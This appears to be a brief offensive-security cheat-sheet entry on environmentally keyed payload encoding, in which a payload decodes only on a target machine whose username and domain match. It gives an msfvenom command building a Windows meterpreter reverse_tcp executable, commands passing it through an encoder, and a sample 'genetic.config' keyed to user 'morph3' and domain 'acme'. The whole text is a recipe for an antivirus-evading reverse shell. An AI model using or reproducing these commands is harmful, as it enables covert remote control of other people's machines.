

We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=9001 -f exe > shell.exe
./ shell.exe genetic.config
./ output/go_symmetric_shell.exe.go morph3-ebowla.exe

An example genetic.config,

     output_type = GO 
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''


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